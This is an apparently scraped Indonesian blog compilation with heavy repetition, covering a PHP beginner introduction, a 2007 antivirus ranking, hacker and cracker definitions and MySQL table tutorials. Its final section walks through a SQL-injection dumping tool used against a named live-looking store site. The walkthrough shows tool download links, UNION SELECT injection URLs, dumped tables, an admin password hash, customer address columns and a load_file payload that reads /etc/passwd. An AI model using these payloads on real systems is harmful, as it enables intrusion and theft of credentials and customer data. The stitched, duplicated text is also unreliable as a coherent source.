15. Aktifkan XMLSchema2.xsd yang baru saja dibuat sehingga kursor berada di XMLSchema Designer. Perhatikan pada properti targetNamespace. Target ini nantinya menjadi penghubung antara XML schema dengan XML File sebagai tempat penyimpanan data.
Dasar-dasar PHP 1
Membuat Website sendiri? Kenapa enggak. Nah, bagi anda yang sama sekali baru di dunia PHP, halaman ini ditujukan untuk menggugah minat dan semangat mempelajari bahasa ini sebagai landasan awal buat kamu yang pengen membuat website dinamis sendiri. Ibarat pepatah, tak kenal maka tak sayang, maka halaman pertama ini dibuat untuk mengenalkan kita pada PHP.
Salam hangat dan Selamat menikmati.
Tutorial ini ditujukan bagi rekan-rekan yang newbie (alias baru) di dunia PHP tapi minimal sudah mengerti tentang HTML (kalo belum silahkan belajar HTML dulu, ndak rumit kok).
PHP adalah sebuah bahasa script yang sangat bagus dan merupakan pasangan yang pas untuk bahasa HTML. Dengan kemampuan PHP untuk membuat website yang dinamis serta keindahan desain menggunakan HTML, maka nyaris tidak ada yang tidak dapat dilakukan gabungan kedua bahasa ini di dunia web. Enaknya lagi, PHP ini merupakan bahasa yang sangat mudah (bagi yang pernah mempelajari C atau bahasa pemrograman lain akan sangat merasakan perbedaaan ini. Contoh salah satu perbedaan yang paling terasa adalah bahwa kita ndak usah repot-repot deklarasi variabel di awal, kalau butuh variabel tinggal pakai).
Kelebihan lain PHP adalah lisensinya yang open source, artinya selain boleh make secara gratis anda memiliki keuntungan tambahan yaitu tersedia banyak sekali materi pendukung yang tersebar di Internet (salah satunya di situs ini). Setelah kita memahami dasar-dasarnya, akan sangat mudah bagi kita untuk mengembangkan kemampuan kita karena ada begitu banyak materi tentang PHP yang bisa kita pelajari lebih lanjut.
Saya sangat menyarankan agar anda mempelajari lebih lanjut pembuatan website menggunakan PHP ini dengan cara mempelajari script-script PHP yang sudah ada. Tentu saja dimulai dari yang sederhana dulu, dan nantinya akan meningkat ke yang lebih kompleks seiring perkembangan kemampuan kita.
Saya sendiri mengenal PHP saat harus membuat aplikasi berbasis web di kantor. Kebetulan disuruh kursus, dan ternyata sangat mudah. Enjoy aja, dan tetap terusin bacanya.
Kamu bisa baca juga artikel tentang Belajar PHP ini untuk mengerti lebih dalam tentang apa dan mengapa kita perlu pake PHP. Selain itu, mungkin anda perlu menyempatkan diri untuk mempelajari strategi belajar PHP terlebih dahulu untuk mengerti urut-urutan yang disarankan untuk mempelajari PHP.
Sebelum mulai, anda perlu menginstal server di komputer anda untuk mencoba script yang anda buat secara lokal. (Jika anda memiliki space di server yang support PHP anda juga bisa ngetes script di sana, tapi lebih rumit dan makan biaya soalnya perlu FTP, akses internet, lama, and so on gitu loh). Kalo belum punya software untuk menambahkan fungsi web server, PHP di komputer anda, coba cari di google kata kunci phptriad download, terus instal aja di PC anda. Kalo udah selesai instal, nyalain Apachenya (kalau udah perlu database nyalain juga MySQLnya, untuk cara koneksi PHP ke MySQL lihat di artikel “menghubungkan PHP dengan MySQL”) terus coba ketik di addres http://localhost kalo dah keluar halaman awal Apache, berarti PC anda sudah siap untuk ngetes PHP. (Sebelum lupa, direktori tempat kita harus meletakkan file-file nanti ada di c:\apache\htdocs, kalo ndak percaya, lihat aja di file index yang ada di direktori itu isinya sama dengan yang muncul di halaman awal waktu kita akses ke localhost). Kamu bisa baca juga artikel tentang cara download PHP dan download MySQL sebelum mulai.
Kalau kamu udah selesai membaca tutorial dasar ini, maka kamu bisa melihat tutorial lain tentang HTML, MySQL, PHP dan MySQL, Contoh Script PHP, contoh proyek PHP dan tutorial lanjutan PHP yang juga tersedia di prothelon.com.
Pengen belajar sambil praktek?
Salam hangat dan Selamat menikmati.
Tutorial ini ditujukan bagi rekan-rekan yang newbie (alias baru) di dunia PHP tapi minimal sudah mengerti tentang HTML (kalo belum silahkan belajar HTML dulu, ndak rumit kok).
PHP adalah sebuah bahasa script yang sangat bagus dan merupakan pasangan yang pas untuk bahasa HTML. Dengan kemampuan PHP untuk membuat website yang dinamis serta keindahan desain menggunakan HTML, maka nyaris tidak ada yang tidak dapat dilakukan gabungan kedua bahasa ini di dunia web. Enaknya lagi, PHP ini merupakan bahasa yang sangat mudah (bagi yang pernah mempelajari C atau bahasa pemrograman lain akan sangat merasakan perbedaaan ini. Contoh salah satu perbedaan yang paling terasa adalah bahwa kita ndak usah repot-repot deklarasi variabel di awal, kalau butuh variabel tinggal pakai).
Kelebihan lain PHP adalah lisensinya yang open source, artinya selain boleh make secara gratis anda memiliki keuntungan tambahan yaitu tersedia banyak sekali materi pendukung yang tersebar di Internet (salah satunya di situs ini). Setelah kita memahami dasar-dasarnya, akan sangat mudah bagi kita untuk mengembangkan kemampuan kita karena ada begitu banyak materi tentang PHP yang bisa kita pelajari lebih lanjut.
Saya sangat menyarankan agar anda mempelajari lebih lanjut pembuatan website menggunakan PHP ini dengan cara mempelajari script-script PHP yang sudah ada. Tentu saja dimulai dari yang sederhana dulu, dan nantinya akan meningkat ke yang lebih kompleks seiring perkembangan kemampuan kita.
Saya sendiri mengenal PHP saat harus membuat aplikasi berbasis web di kantor. Kebetulan disuruh kursus, dan ternyata sangat mudah. Enjoy aja, dan tetap terusin bacanya.
Kamu bisa baca juga artikel tentang Belajar PHP ini untuk mengerti lebih dalam tentang apa dan mengapa kita perlu pake PHP. Selain itu, mungkin anda perlu menyempatkan diri untuk mempelajari strategi belajar PHP terlebih dahulu untuk mengerti urut-urutan yang disarankan untuk mempelajari PHP.
Sebelum mulai, anda perlu menginstal server di komputer anda untuk mencoba script yang anda buat secara lokal. (Jika anda memiliki space di server yang support PHP anda juga bisa ngetes script di sana, tapi lebih rumit dan makan biaya soalnya perlu FTP, akses internet, lama, and so on gitu loh). Kalo belum punya software untuk menambahkan fungsi web server, PHP di komputer anda, coba cari di google kata kunci phptriad download, terus instal aja di PC anda. Kalo udah selesai instal, nyalain Apachenya (kalau udah perlu database nyalain juga MySQLnya, untuk cara koneksi PHP ke MySQL lihat di artikel “menghubungkan PHP dengan MySQL”) terus coba ketik di addres http://localhost kalo dah keluar halaman awal Apache, berarti PC anda sudah siap untuk ngetes PHP. (Sebelum lupa, direktori tempat kita harus meletakkan file-file nanti ada di c:\apache\htdocs, kalo ndak percaya, lihat aja di file index yang ada di direktori itu isinya sama dengan yang muncul di halaman awal waktu kita akses ke localhost). Kamu bisa baca juga artikel tentang cara download PHP dan download MySQL sebelum mulai.
Kalau kamu udah selesai membaca tutorial dasar ini, maka kamu bisa melihat tutorial lain tentang HTML, MySQL, PHP dan MySQL, Contoh Script PHP, contoh proyek PHP dan tutorial lanjutan PHP yang juga tersedia di prothelon.com.
Pengen belajar sambil praktek?
10 anti virus terbaik di dunia
What to look for in Anti-Virus Software ???
Software anti-virus teratas sebaiknya mudah digunakan
pengguna awam komputer untuk menggunakan dan
instalasi. Software2 sebaiknya sangat efektif utk
mencari dan mengindentifikasi virus / program2 jahat,
seperti membersihkan atau mengisolasi file-file yang
terinfeksi. Mereka (user) dapat lebih memahami dalam
melakukan scan (pendeteksian) dan cukupnya support
system yang tersedia, Jadi Kamu dapat mudah
mendapatkan informasi tentang aktifitas
software-software dan kemampuannya. Dibawah ini adalah
point-point dari kriteria anti-virus yang dipakai oleh
“TopTenREVIEWS” utk menilainya:
1.) Ease of Use –
Software anti-virus yang Sangat sederhana dan mudah
untuk digunakan, tanpa memperhatikan seseorang yang
berpengalaman dibidang komputer atau pengetahuan
tentang virus-virus.
2.) Effective at Identifying Viruses and Worms –
Produk-produk Anti-virus yang terbaik
mengindentifikasi file-file yang terinfeksi dengan
cepat dari awal sampai habis dalam scanning secara
real-time, pencarian virus-virus pada source-source
yang bertumpuk lagi banyak, juga termasuk email,
aplikasi instant message, web browsing and masih
banyak lagi.
3.) Effective at Cleaning or Isolating Infected Files
–Software-software anti-virus yang sungguh mampu
membersihkan dengan teliti dan cermat, menghapus atau
mengkarantina file-file yang terinfeksi—menjaganya
dari penyebaran yang menyeluruh dari
harddrive-harddrive atau dari network.
4.) Activity Reporting –
Program-program anti-virus sebaiknya memberikan
pemberitahuan tentang virus-virus yang ditemukan
dengan segera secara “real-time scanners” dan juga
melengkapi laporan yang “easy-to-read” dari
hasil-hasil scan, memasukkan apa yang anti-virus itu
temukan dan apa yang dilakukan dengan file-file yang
terinfeksi.
5.) Feature Set –
Fitur yang baik dalam patroli dan utk mengijinkan
setelan software anti-virus agar menyediakan proteksi
secara penuh. Program-progran yang baik itu memberikan
bermacam-macam tool-tool yang bervariasi, dari “basic
real-time scanning” sampai yang “advanced”, “heuristic
scanning” dan “script blocking”—ketika itu sampai ke
“virus protection”, Dan option-option yang bagus lebih
banyak lagi.
6.) Ease of Installation and Setup –
Program-program anti-virus sebaiknya sangat cepat
dalam melakukan instalasi, membuat mudah utk cepat
keluar dari instalasi beralih ke “initial scan” dengan
hanya melakukan double-click pada mouse saja.
7.) Help Documentation –
Software anti-virus yang High-end datang dengan
banyaknya “help”, dilengkapi support via email, online
chat atau “over the telephone”. Sebaiknya pula
disediakan “online resources”, seperti “Dasar-dasar
pengetahuan” dan FAQs (tanya-jawab) secara mudah-cepat
dan help (bantuan) yang sesuai/tepat.
Untuk itu TopTenREVIEWS mengumumkan dari hasil
benchmark-nya … siapa-siapa yang masuk 10 urutan
teratas utk Top Ten 2007 :
1. BitDefender
2. Kaspersky
3. F-Secure Anti-Virus
4. PC-cillin
5. ESET NOD32
6. McAfee VirusScan
7. Norton AntiVirus
8. AVG AntiVirus
9. eTrust EZ Antivirus
10. Norman Virus Control
Pengertian Hacker dan Cracker
1. Hacker
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
2. Cracker
Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
Hirarki / Tingkatan Hacker
Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
1.Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2.Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3.Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4.Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5.Lammer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
2. Cracker
Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
Hirarki / Tingkatan Hacker
Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
1.Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2.Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3.Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4.Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5.Lammer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja
membuat Database dan tabel
database terdiri dari satu atau banyak tabel.
Membuat Database
Pernyataan CREATE DATABASE digunakan untuk membuat database dalam MySQL.
Penulisan
CREATE DATABASE nama_database
Agar PHP mengeksekusi pernyataan tersebut di atas kita harus menggunakan fungsi mysql_query() . Fungsi ini berguna untuk mengirimkan query atau perintah ke koneksi MySQL
Contoh
Pada contoh berikut ini kita membuat sebuah database dengan nama “my_db”:
$con = mysql_connect("localhost","peter","abc123");
if (!$con)
{ die('Could not connect: ' . mysql_error());
}
if (mysql_query("CREATE DATABASE my_db",$con))
{
echo "Database created";
}
else
{
echo "Error creating database: " . mysql_error();
}
mysql_close($con);
?>
Membuat Table
Pernyataan CREATE TABLE digunakan untuk menbuat tabel di dalam database table in MySQL.
Penulisan
CREATE TABLE table_name ( column_name1 data_type, column_name2 data_type, column_name3 data_type, ....... )
We must add the CREATE TABLE statement to the mysql_query() function to execute the command.
Contoh
The following example shows how you can create a table named “person”, with three columns. The column names will be “FirstName”, “LastName” and “Age”:
// Create database if (mysql_query("CREATE DATABASE my_db",$con)) { echo "Database created"; } else { echo "Error creating database: " . mysql_error(); }
// Create table in my_db database mysql_select_db("my_db", $con); $sql = "CREATE TABLE person ( FirstName varchar(15), LastName varchar(15), Age int )"; mysql_query($sql,$con);
mysql_close($con); ?>
Penting : Sebuah database haris dipilih sebelug table dapat dibuat. Memilih database dilakukan denga menggunakan function select_db()
Note: Bila anda membuat field database dengan type varchar, anda harus mengisikan panjang maksimum dari field tersebut misal varchar(15).
Type Data MySQL
Berikut beberapa type data MySQL yang dapat digunakan :
Numeric Data Types Description
int(size)
smallint(size)
tinyint(size)
mediumint(size)
bigint(size) Hanya integers. maximum digit dapat ditentukan dalam parameter size
decimal(size,d)
double(size,d)
float(size,d) angka dan fractions. maximum jumlah digit dapat ditentukan pada parameter size. maximum digit of di kanan decimal ditentukan parameter d
Textual Data Types Description
char(size) fixed length string (can contain letters, numbers, and special characters). fixed size ditentukan dalam parameter
varchar(size) string (can contain letters, numbers, and special characters). maximum size ditentukan dalam parameter
tinytext string dengan panjang maksimum 255 characters
text
blob Holds a variable string with a maximum length of 65535 characters
mediumtext
mediumblob string dengan panjang maksimum 16777215 characters
longtext
longblob string dengan panjang maksimum 4294967295 characters
Date Data Types Description
date(yyyy-mm-dd)
datetime(yyyy-mm-dd hh:mm:ss)
timestamp(yyyymmddhhmmss)
time(hh:mm:ss) Holds date and/or time
Misc. Data Types Description
enum(value1,value2,ect) ENUM adalah singkatan dari ENUMERATED. Dapat menyimpan one s/d 65535 list nilai dalam tanda kurung ( ). Jika nilai yang dimasukan tidak terdapat dalam list, akan dimasukan nilai blank
set SET milirip ENUM. dimana , SET dapat memupnya s/d 64 item list dan dapat menyimpan banyak
Kunci Primary dan fields Auto Increment
Setiap tabel seharusmnya mempunya field kunci primary.
Kunci primary digunakan sebagai identifikasi uniq baris dalam tabel. Setiap nilai kunci primary harus uniq . field kunci primary tidak boleh null karena database engine meminta nilai untuk mendapatkan record tersebut.field kunci primary selalu diindex. There is no exception to this rule! Anda harus index kunci primary sehingga database engine dapat dengan cepat ke baris sesuai nilai kunci.Conto berikut menetapkan field personID sebagai field kunci primary. field kunci primary selalu sebua ID number, dan selalu digunakan dengan AUTO_INCREMENT setting. AUTO_INCREMENT secara automatis menambahkan niali pada field setiap kali penambahan record baru. untuk meyakinkan field kunci primary tersebut tidak null, kita harus tambahkan “NOT NULL” setting untuk field.
Contoh
$sql = "CREATE TABLE person
(
personID int NOT NULL AUTO_INCREMENT,
PRIMARY KEY(personID),
FirstName varchar(15),
LastName varchar(15),
Age int
)";
mysql_query($sql,$con);
Filed under: mySQL, Pemrograman, PHP
Membuat Database
Pernyataan CREATE DATABASE digunakan untuk membuat database dalam MySQL.
Penulisan
CREATE DATABASE nama_database
Agar PHP mengeksekusi pernyataan tersebut di atas kita harus menggunakan fungsi mysql_query() . Fungsi ini berguna untuk mengirimkan query atau perintah ke koneksi MySQL
Contoh
Pada contoh berikut ini kita membuat sebuah database dengan nama “my_db”:
$con = mysql_connect("localhost","peter","abc123");
if (!$con)
{ die('Could not connect: ' . mysql_error());
}
if (mysql_query("CREATE DATABASE my_db",$con))
{
echo "Database created";
}
else
{
echo "Error creating database: " . mysql_error();
}
mysql_close($con);
?>
Membuat Table
Pernyataan CREATE TABLE digunakan untuk menbuat tabel di dalam database table in MySQL.
Penulisan
CREATE TABLE table_name ( column_name1 data_type, column_name2 data_type, column_name3 data_type, ....... )
We must add the CREATE TABLE statement to the mysql_query() function to execute the command.
Contoh
The following example shows how you can create a table named “person”, with three columns. The column names will be “FirstName”, “LastName” and “Age”:
// Create database if (mysql_query("CREATE DATABASE my_db",$con)) { echo "Database created"; } else { echo "Error creating database: " . mysql_error(); }
// Create table in my_db database mysql_select_db("my_db", $con); $sql = "CREATE TABLE person ( FirstName varchar(15), LastName varchar(15), Age int )"; mysql_query($sql,$con);
mysql_close($con); ?>
Penting : Sebuah database haris dipilih sebelug table dapat dibuat. Memilih database dilakukan denga menggunakan function select_db()
Note: Bila anda membuat field database dengan type varchar, anda harus mengisikan panjang maksimum dari field tersebut misal varchar(15).
Type Data MySQL
Berikut beberapa type data MySQL yang dapat digunakan :
Numeric Data Types Description
int(size)
smallint(size)
tinyint(size)
mediumint(size)
bigint(size) Hanya integers. maximum digit dapat ditentukan dalam parameter size
decimal(size,d)
double(size,d)
float(size,d) angka dan fractions. maximum jumlah digit dapat ditentukan pada parameter size. maximum digit of di kanan decimal ditentukan parameter d
Textual Data Types Description
char(size) fixed length string (can contain letters, numbers, and special characters). fixed size ditentukan dalam parameter
varchar(size) string (can contain letters, numbers, and special characters). maximum size ditentukan dalam parameter
tinytext string dengan panjang maksimum 255 characters
text
blob Holds a variable string with a maximum length of 65535 characters
mediumtext
mediumblob string dengan panjang maksimum 16777215 characters
longtext
longblob string dengan panjang maksimum 4294967295 characters
Date Data Types Description
date(yyyy-mm-dd)
datetime(yyyy-mm-dd hh:mm:ss)
timestamp(yyyymmddhhmmss)
time(hh:mm:ss) Holds date and/or time
Misc. Data Types Description
enum(value1,value2,ect) ENUM adalah singkatan dari ENUMERATED. Dapat menyimpan one s/d 65535 list nilai dalam tanda kurung ( ). Jika nilai yang dimasukan tidak terdapat dalam list, akan dimasukan nilai blank
set SET milirip ENUM. dimana , SET dapat memupnya s/d 64 item list dan dapat menyimpan banyak
Kunci Primary dan fields Auto Increment
Setiap tabel seharusmnya mempunya field kunci primary.
Kunci primary digunakan sebagai identifikasi uniq baris dalam tabel. Setiap nilai kunci primary harus uniq . field kunci primary tidak boleh null karena database engine meminta nilai untuk mendapatkan record tersebut.field kunci primary selalu diindex. There is no exception to this rule! Anda harus index kunci primary sehingga database engine dapat dengan cepat ke baris sesuai nilai kunci.Conto berikut menetapkan field personID sebagai field kunci primary. field kunci primary selalu sebua ID number, dan selalu digunakan dengan AUTO_INCREMENT setting. AUTO_INCREMENT secara automatis menambahkan niali pada field setiap kali penambahan record baru. untuk meyakinkan field kunci primary tersebut tidak null, kita harus tambahkan “NOT NULL” setting untuk field.
Contoh
$sql = "CREATE TABLE person
(
personID int NOT NULL AUTO_INCREMENT,
PRIMARY KEY(personID),
FirstName varchar(15),
LastName varchar(15),
Age int
)";
mysql_query($sql,$con);
Filed under: mySQL, Pemrograman, PHP
Simple SQL Dumper V.5.1
[o] attention
USE THIS TOOL FOR EDUCATION PURPOSE ONLY.
WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!
[o] what is SSDp?
SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.
[o] download SSDp v5.1
http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz
[o] function
- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column
[o] command and option
[root@evilc0de noge]# perl ssdp.pl -h
|—————————————————————————–|
| Usage: perl ssdp.pl [options] |
| |
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: “–”) |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: “+”) |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
| |
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
| |
| -log [file name] file name to save ssdp data (default: ssdp.log) |
| -p [http proxy] hostname:port |
|—————————————————————————–|
[o] proof of concept
[0x01] magic number (null column).
first of all we have to find null column (magic number).
null column used for execute our SQL query.
# perl ssdp.pl -u [target URL] -magic
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: –
Attempting to find the magic number…
[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Showing MySQL Information …
[+] Database: 460store
[+] User: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to “mysql” Database: No
[+] Read File “/etc/passwd”: Yes (w00t)
[+] Create File “/tmp/c0li-430.txt”: Yes (w00t)
Done.
our magic number is 1 and it will replace with “c0li” string.
we can see the database information and operation system too.
[0x02] finding table
now we use URL that include “c0li” string on it to find table & column.
# perl ssdp.pl -u [c0li URL] -table
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Number of Tables: 18
Showing tables …
[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)
Done.
that is the list of all table in database()
[0x03] finding column
let’s see column from table called “security”.
# perl ssdp.pl -u [c0li URL] -t [table] -column
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5
Showing columns from table “security” …
[+] security(1): user_id,username,password,admin,last_login
Done.
aha! we got column called “username” and “password”.
[0x04] dumping data
now we’ll see information inside that column.. :)
# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1
Dumping Data …
[1] admin : 2ec20101734c754d
Done.
we got admin username and password hash. :D
ok i have show you how to find magic number, table, column and dump data the column using SSDp.
[0x05] search column name (-find)
now i’ll show you how to use -find option (Search Columns Name)
i’ll try to search column with keyword “address” it require -c option (column)
# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find
[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, –help
[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: –
[+] Database Name: 460store
[+] Column Name string to search: address
Searching for Columns Path …
[+] Columns Found:
[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name
Done.
found column with word “address” on table “customer”. easy right? :p
[0x06] read & create file (read only)
now let’s see Read File (read only) & Create File (read only).
why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(
as you can see at the first time we find magic number you’ll find this line.
[+] Read File “/etc/passwd” : Yes (w00t)
[+] Create File “/tmp/c0li-159.txt” : Yes (w00t)
it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.
to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec
http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–
the result will be like this.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
let’s create some file in /tmp directory. :)
